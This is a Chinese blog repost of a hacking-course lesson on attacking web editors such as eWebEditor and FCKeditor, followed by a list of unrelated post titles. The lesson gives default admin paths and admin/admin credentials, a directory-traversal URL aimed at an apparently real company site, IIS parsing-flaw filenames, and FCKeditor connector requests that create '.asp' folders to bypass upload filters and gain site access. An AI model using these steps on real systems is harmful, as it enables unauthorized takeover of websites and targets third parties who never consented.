小迪教程第十二天——编辑器漏洞
来源:互联网 发布:高速铣编程用什么软件 编辑:程序博客网 时间:2024/05/21 09:43
1、目前网站采用编辑器有哪些?
Ewebeditor(asp),fckeditor(asp/aspx),kindeditor(php),southidceditor,cfeditor(php)等
2、ewebeditor编译器漏洞
找后台地址,尝试默认帐号密码登录,添加上传类型,上传脚本文件获得网站权限(地址找不到,默认帐号密码被修改,无法添加上传类型)
默认后台地址:ewebeditor/admin_login.asp
默认帐号密码:admin/admin
默认数据库地址:ewebeditor/db/ewebeditor.mdb
无法添加上传类型时,可自行添加上传图片按钮
出现浏览器上传图片按钮失效,可采用ietest软件模拟ie6.0访问上传
ewebeditor目录遍历漏洞,主要存在于asp
http://www.kirinmach.com/ewebeditor/admin_uploadfile.asp?id=14&dir=../..
3、Fck高版本过滤“.” (“.”变”_”)
基于解析漏洞利用获取网站权限
解析漏洞:
文件 xx.asp;.jpg
文件夹 xx.asp/xx.jpg
1、二次上传突破(windows同目录不可能存在两个同名的文件)
第一次上传:qq.asp;.jpg ==> qq_asp;.jpg
第二次上传:qq.asp;.jpg =/=> qq_asp;.jpg(qq.asp;(1).jpg)
2、新建上传突破
成功新建文件夹数据包:L
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
失败手工创建文件夹数据包:
FCKeditor_2.5//editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=qq.asp
过滤的是参数NewFolderName,而没有过滤参数CurrentFolder,CurrentFolder参数能操作文件夹
- 小迪教程第十二天——编辑器漏洞
- 小迪教程第十二天——XSS攻击
- 小迪教程第十天——文件上传解析漏洞
- 【Unity】编辑器小教程
- 【Unity】编辑器小教程
- 小迪教程——第二天
- NESASM教程——第十二天——VBlank和中断
- Unix-Linux编程实践教程——第十二章
- 小迪教程第四天——Php+mysql注入
- Unity3d——自定义编辑器Editor教程
- java基础———第十二天
- 第十二天——平淡一天
- 第十二天——Second Quiz
- java学习总结——第十二天
- 东软睿道实训日记——第十二天
- 第十二章—Bitmap
- 第十二章—PopupWindow
- 第十二章—SurfaceView
- git 常用命令
- DHCP协议
- 《Single Image Haze Removal Using Dark Channel Prior》一文中图像去雾算法的原理、实现、效果(速度可实时)
- #define用法
- 购物车的简单实现
- 小迪教程第十二天——编辑器漏洞
- ACM周末总结—10月22日
- mysql组合查询(union和union all)
- 第四章 实现应用程序的功能
- threading模块
- 严蔚敏版数据结构课本代码——算法2.2
- 线性滤波和非线性滤波
- 从机器语言角度理解值传递和地址传递
- 菜鸟先飞之JAVA_网络编程